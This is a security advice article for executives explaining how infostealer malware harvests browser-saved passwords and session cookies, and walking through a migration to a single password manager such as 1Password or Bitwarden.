Get Your Passwords Out of the Browser

The Sunday Phone Call

The phone call goes the same way every time. An executive, usually a founder or a partner at a firm, has had something bad happen. Their email started sending things they did not write. Their bank flagged a wire. Their Microsoft 365 account is locked because someone in another country was logged in as them.

We start asking the boring questions. Where were the passwords? And the answer is always some version of the same thing: a few in Chrome, a few in Safari on the iPhone, a vault from 2019 that they half-use, a Note app with about thirty in it, and a spreadsheet from when they bought the business. They cannot tell you which one leaked because they cannot tell you what is in any of them.

That fragmentation is the real story. It is not that any one of those stores is uniquely terrible. It is that no one of them is the truth. When something goes wrong, you cannot scope the damage. You reset everything, badly, and hope you got the right ones.

The browser was never designed to be a vault. It was designed to be convenient. Those are different jobs, and treating them as the same is how the Sunday phone call happens.

The Threat is Routine, Not Theoretical

The reason browser-stored passwords are the weakest link in your stack right now has a name: infostealer malware. It is not exotic. It is not nation-state. It is commodity software, sold for a few hundred dollars on criminal marketplaces, and it does exactly one job — quietly open Chrome or Edge or Safari and walk out with everything you saved.

In the first half of 2025, infostealer malware harvested 1.8 billion credentials. That is an 800% jump over the prior six months. This is the most common way a working executive's account gets taken in 2026, and it almost never looks like a movie.

Here is what actually happens. You click a fake CAPTCHA, a poisoned ad, a "your invoice is attached" PDF, or a Google search result that drops a small program onto your machine. That program runs as you. It does not need to break Windows or Chrome. It opens the password file Chrome saved for you, decrypts it using your own logged-in session, and uploads the contents. It also grabs your session cookies, which can be worse than passwords — with your Microsoft 365 session cookie, an attacker can log in as you with MFA on the account, because the system already thinks you are you.

The whole thing finishes in seconds. No popup. No warning. Antivirus often does not catch it.

Three families dominate the 2026 landscape and are worth knowing by name. Lumma was disrupted by Microsoft, the FBI, and Europol in May 2025 (about 2,300 domains seized) and was back at scale within weeks. RedLine was knocked back by Operation Magnus in October 2024, but the stolen logs are still circulating. And then there is VoidStealer, identified in 2026, which specifically defeats Chrome's "Application-Bound Encryption" protection — the thing Google added in Chrome 127 to make this exact attack harder. Google tried to fix this and within about 18 months a piece of malware shipped that gets around the fix.

Browser vendors are in an arms race they are not winning consistently. The credential theft and the actual compromise are often weeks or months apart, which is part of why the attack surprises people. The Sunday call is usually about something stolen in March.

The Fragmentation Problem

Most executives have passwords in three to five places without realizing it. Chrome on a personal laptop. Safari and iCloud Keychain on the iPhone. Edge on a Windows work machine. A real password manager from 2019 that they half-use. And a Note, a Stickies pad, or a spreadsheet. Yes, still, in 2026.

The problem is concrete:

• You cannot scope an incident. When you ask "what passwords would an attacker get from my Mac?", you cannot actually answer it.
• You default to the weakest link. When the same login lives in three places and one auto-fills, you use that one. The least secure store wins.
• Recovery is brutal. Phone lost, account locked, laptop replaced — you do not know which store had the right password, so you reset everything badly.
• Sharing is impossible. Your assistant or your spouse needs the Comcast login. The browser cannot share it cleanly. So you text it. Now it is also in iMessage.
• You cannot audit. A real password manager will tell you "47 passwords reused, 12 in known breaches, 6 weak." Browsers do a partial version of this, inconsistently.

The fix is not to add a fifth place. The fix is to pick one vault, move everything into it, and delete the others.

The Decision — In One Table

There are four real options. Skip the prose. Find the row that looks like your life.

The honest "executive default" answer is 1Password. Not because it is magic. Because if you are cross-platform and your time is worth more than $4 a month, paying for the polished one removes the friction that makes people abandon password managers. Bitwarden is the cheaper, open-source alternative and it is genuinely fine — meaningfully less polished in the browser extension, but functionally on par. Wirecutter's 2026 pick is 1Password, and we agree.

Two things to know about the free options. Apple Passwords on Windows is noticeably degraded — no passkeys, no shared groups, no Wi-Fi password access — so if you have a Windows work laptop, you need a real cross-platform tool. And Google Password Manager's default encryption is not zero-knowledge unless you turn on On-Device Encryption, which most people never do. If you stay on Google's manager, that step is non-negotiable.

The LastPass Cautionary Tale

LastPass was the largest password manager in the world until its 2022 breach, in which attackers exfiltrated encrypted vaults and have been brute-forcing them for years. In March 2025, federal investigators linked roughly $150 million in cryptocurrency theft directly to vaults stolen in that 2022 breach.

The lesson is not "password managers are unsafe." The lesson is:

• The manager itself can be a target. Pick a vendor with a clean track record.
• Your master password being long and unique matters enormously, because if a vault is ever stolen, that password is the only thing standing between the attacker and your data.
• Your manager must have its own MFA enabled. Hardware key if you have one, authenticator app if you do not. Never SMS.
• We do not recommend LastPass.

The 90-Minute Migration

Realistic time end to end is 45 to 90 minutes. You will be in front of your laptop and phone the whole time. Do not try to do this between meetings.

• Pick the manager. Use the table. 1Password or Bitwarden if cross-platform. Apple Passwords if all-Apple. Move on.
• Create the account with a strong master password. 16 characters minimum — use a passphrase of four random words, not a complicated short string. Write it on physical paper and put it somewhere only you can access. This is the one password that cannot be in the cloud.
• Turn on MFA on the manager itself. This is the most-skipped step. Hardware key or authenticator app. Never SMS. The manager is now the keys to your life.
• Export from your browsers. Chrome at passwords.google.com → Settings → Download passwords. Edge: Settings → Profiles → Passwords → Export. Safari on Mac: Passwords app → File → Export. The CSV is plaintext — treat it like a loaded weapon.
• Import into your new manager. All the major ones accept the browser CSV format. Run the wizard.
• DELETE THE CSV. Now. Empty the trash. On Windows, Shift+Delete. The CSV is the largest single risk in this whole process — every password you own, in cleartext, on disk.
• Delete passwords from the browsers and turn off browser autofill. This is the step most people skip. If you skip it, you have added a tool, not solved the problem. Chrome: passwords.google.com → select all → delete; then toggle OFF "Offer to save passwords." Edge: same shape. Safari: Passwords app → delete; Safari Settings → AutoFill → uncheck "User names and passwords."
• Install the manager's browser extension. On every browser you actually use. The extension is what auto-fills now — not the browser.
• Run the manager's vault health report. 1Password calls this Watchtower. Bitwarden has Vault Health Reports. You will see "47 reused, 12 weak, 6 in known breaches." Spend 20 minutes fixing the worst ten — banks, primary email, Microsoft 365, Apple ID, anything financial. You do not have to fix them all today.
• Set up your phone. Install the app, sign in, turn on Face ID for unlock, set the manager as the default password fill provider. iPhone: Settings → General → AutoFill & Passwords. Android: Settings → Passwords & accounts → Password service.

What "Done" Looks Like

You are done when six things are true:

• One password manager, with MFA on it.
• Browser autofill turned off.
• Browser password stores empty.
• Master password on physical paper in a safe place.
• Vault Health report run, top 10 weakest passwords rotated.
• Manager app installed on your phone, Face ID enabled.

If all six are true, you have removed yourself from roughly 90% of the threat model that produces "your account has been compromised" calls in 2026. Not all of it — phishing and session-cookie theft still exist — but the easiest, cheapest, most-automated attack is no longer effective against you.

That is the goal. Not perfection. Just being a harder target than the next person on the list.

Two Honest Objections

"What about passkeys? I keep hearing about passkeys." Passkeys are real and they are better. Apple Passwords, 1Password, Bitwarden, and Google Password Manager all support them. You do not have to choose between passwords and passkeys — your manager will store both. As more sites support passkeys (Google, Microsoft, Apple, Amazon, PayPal, eBay all do already), your manager will quietly migrate you. Picking a manager today is the prerequisite to using passkeys well tomorrow.

"My IT department manages this." For your work account, sometimes. For your personal email, your bank, your Costco login, your kid's pediatrician portal — no, they do not. Personal credential hygiene is on you. And if a personal account gets popped and the same password protects something at work, the line between "personal" and "work" stops mattering very quickly.